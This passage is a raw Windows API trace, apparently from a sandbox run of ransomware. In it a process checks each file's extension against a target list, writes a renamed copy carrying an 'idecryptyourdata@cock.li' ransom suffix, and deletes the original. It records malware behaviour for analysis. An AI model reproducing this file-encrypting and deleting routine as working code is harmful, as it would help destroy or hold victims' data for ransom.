(lpString1=".7z", lpString2="rtf") returned -1 [0047.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.516] lstrlenW (lpString=".dbf") returned 4 [0047.516] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.516] lstrlenW (lpString=".1cd") returned 4 [0047.516] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.516] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned 35 [0047.516] lstrlenW (lpString=".jpg") returned 4 [0047.516] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.517] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.517] lstrlenW (lpString="eula.rtf") returned 8 [0047.517] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.519] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=54456) returned 1 [0047.519] CloseHandle (hObject=0x2d0) returned 1 [0047.519] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 0x80 [0047.519] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.519] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.519] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.519] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.519] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.521] GetLastError () returned 0x0 [0047.521] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xd4b8, lpOverlapped=0x0) returned 1 [0047.582] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xd4c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xd4c0, lpOverlapped=0x0) returned 1 [0047.583] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.584] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.584] SetEndOfFile (hFile=0x2d8) returned 1 [0047.584] CloseHandle (hObject=0x2d8) returned 1 [0047.585] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.585] SetEndOfFile (hFile=0x2d0) returned 1 [0047.586] CloseHandle (hObject=0x2d0) returned 1 [0047.586] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.587] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 1 [0047.587] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.587] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.587] lstrlenW (lpString=".doc") returned 4 [0047.587] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.587] lstrlenW (lpString=".docx") returned 5 [0047.587] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.587] lstrlenW (lpString=".pdf") returned 4 [0047.587] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.587] lstrlenW (lpString=".xls") returned 4 [0047.587] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.587] lstrlenW (lpString=".xlsx") returned 5 [0047.587] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.587] lstrlenW (lpString=".ppt") returned 4 [0047.587] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.587] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.588] lstrlenW (lpString=".zip") returned 4 [0047.588] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.588] lstrlenW (lpString=".rar") returned 4 [0047.588] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.588] lstrlenW (lpString=".bz2") returned 4 [0047.588] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.588] lstrlenW (lpString=".7z") returned 3 [0047.588] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.588] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.588] lstrlenW (lpString=".dbf") returned 4 [0047.588] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.588] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.588] lstrlenW (lpString=".1cd") returned 4 [0047.588] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.588] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.588] lstrlenW (lpString=".jpg") returned 4 [0047.588] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.588] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.588] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.589] lstrlenW (lpString=".doc") returned 4 [0047.589] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.589] lstrlenW (lpString=".docx") returned 5 [0047.589] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.589] lstrlenW (lpString=".pdf") returned 4 [0047.589] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.589] lstrlenW (lpString=".xls") returned 4 [0047.589] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.589] lstrlenW (lpString=".xlsx") returned 5 [0047.589] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.589] lstrlenW (lpString=".ppt") returned 4 [0047.589] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.589] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.589] lstrlenW (lpString=".zip") returned 4 [0047.589] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.589] lstrlenW (lpString=".rar") returned 4 [0047.589] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.589] lstrlenW (lpString=".bz2") returned 4 [0047.589] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.589] lstrlenW (lpString=".7z") returned 3 [0047.589] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.589] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.590] lstrlenW (lpString=".dbf") returned 4 [0047.590] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.590] lstrlenW (lpString=".1cd") returned 4 [0047.590] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.590] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0047.590] lstrlenW (lpString=".jpg") returned 4 [0047.590] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.590] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.590] lstrlenW (lpString="eula.rtf") returned 8 [0047.590] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.590] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=3865) returned 1 [0047.590] CloseHandle (hObject=0x2d0) returned 1 [0047.590] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 0x80 [0047.591] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.591] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.591] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.591] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.591] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.591] GetLastError () returned 0x0 [0047.591] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xf19, lpOverlapped=0x0) returned 1 [0047.608] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf20, lpOverlapped=0x0) returned 1 [0047.609] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.609] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.609] SetEndOfFile (hFile=0x2d8) returned 1 [0047.609] CloseHandle (hObject=0x2d8) returned 1 [0047.610] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.610] SetEndOfFile (hFile=0x2d0) returned 1 [0047.611] CloseHandle (hObject=0x2d0) returned 1 [0047.611] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.611] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 1 [0047.622] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.622] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.622] lstrlenW (lpString=".doc") returned 4 [0047.623] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString=".docx") returned 5 [0047.623] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.623] lstrlenW (lpString=".pdf") returned 4 [0047.623] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString=".xls") returned 4 [0047.623] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.623] lstrlenW (lpString=".xlsx") returned 5 [0047.623] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.623] lstrlenW (lpString=".ppt") returned 4 [0047.623] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString=".zip") returned 4 [0047.623] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.623] lstrlenW (lpString=".rar") returned 4 [0047.623] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString=".bz2") returned 4 [0047.623] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString=".7z") returned 3 [0047.623] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString=".dbf") returned 4 [0047.623] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString=".1cd") returned 4 [0047.623] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString=".jpg") returned 4 [0047.623] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.623] lstrlenW (lpString=".doc") returned 4 [0047.623] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.623] lstrlenW (lpString=".docx") returned 5 [0047.623] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.624] lstrlenW (lpString=".pdf") returned 4 [0047.624] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString=".xls") returned 4 [0047.624] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.624] lstrlenW (lpString=".xlsx") returned 5 [0047.624] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.624] lstrlenW (lpString=".ppt") returned 4 [0047.624] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.624] lstrlenW (lpString=".zip") returned 4 [0047.624] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.624] lstrlenW (lpString=".rar") returned 4 [0047.624] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString=".bz2") returned 4 [0047.624] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString=".7z") returned 3 [0047.624] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.624] lstrlenW (lpString=".dbf") returned 4 [0047.624] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.624] lstrlenW (lpString=".1cd") returned 4 [0047.624] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.624] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 35 [0047.624] lstrlenW (lpString=".jpg") returned 4 [0047.624] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.624] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.624] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.624] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.625] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=77680) returned 1 [0047.625] CloseHandle (hObject=0x2d0) returned 1 [0047.625] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 0x80 [0047.625] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.625] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.625] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.625] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.625] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.625] GetLastError () returned 0x0 [0047.625] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x12f70, lpOverlapped=0x0) returned 1 [0047.636] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x12f80, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x12f80, lpOverlapped=0x0) returned 1 [0047.639] ReadFile (in: hFile=0x2d0, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.639] WriteFile (in: hFile=0x2d8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.639] SetEndOfFile (hFile=0x2d8) returned 1 [0047.639] CloseHandle (hObject=0x2d8) returned 1 [0047.641] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.641] SetEndOfFile (hFile=0x2d0) returned 1 [0047.642] CloseHandle (hObject=0x2d0) returned 1 [0047.642] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.642] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml")) returned 1 [0047.643] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.643] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.643] lstrlenW (lpString=".doc") returned 4 [0047.643] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString=".docx") returned 5 [0047.643] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.643] lstrlenW (lpString=".pdf") returned 4 [0047.643] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString=".xls") returned 4 [0047.643] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString=".xlsx") returned 5 [0047.643] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.643] lstrlenW (lpString=".ppt") returned 4 [0047.643] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.643] lstrlenW (lpString=".zip") returned 4 [0047.643] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.643] lstrlenW (lpString=".rar") returned 4 [0047.643] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString=".bz2") returned 4 [0047.643] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.643] lstrlenW (lpString=".7z") returned 3 [0047.643] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString=".dbf") returned 4 [0047.644] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString=".1cd") returned 4 [0047.644] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString=".jpg") returned 4 [0047.644] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString=".doc") returned 4 [0047.644] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString=".docx") returned 5 [0047.644] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.644] lstrlenW (lpString=".pdf") returned 4 [0047.644] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString=".xls") returned 4 [0047.644] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString=".xlsx") returned 5 [0047.644] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.644] lstrlenW (lpString=".ppt") returned 4 [0047.644] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.644] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.644] lstrlenW (lpString=".zip") returned 4 [0047.644] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.644] lstrlenW (lpString=".rar") returned 4 [0047.645] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.645] lstrlenW (lpString=".bz2") returned 4 [0047.645] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.645] lstrlenW (lpString=".7z") returned 3 [0047.645] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.645] lstrlenW (lpString=".dbf") returned 4 [0047.645] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.645] lstrlenW (lpString=".1cd") returned 4 [0047.645] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.645] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 44 [0047.645] lstrlenW (lpString=".jpg") returned 4 [0047.645] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.645] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.645] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.645] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.645] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=76818) returned 1 [0047.645] CloseHandle (hObject=0x2d0) returned 1 [0047.646] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 0x80 [0047.646] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.646] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.646] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.646] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.646] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: 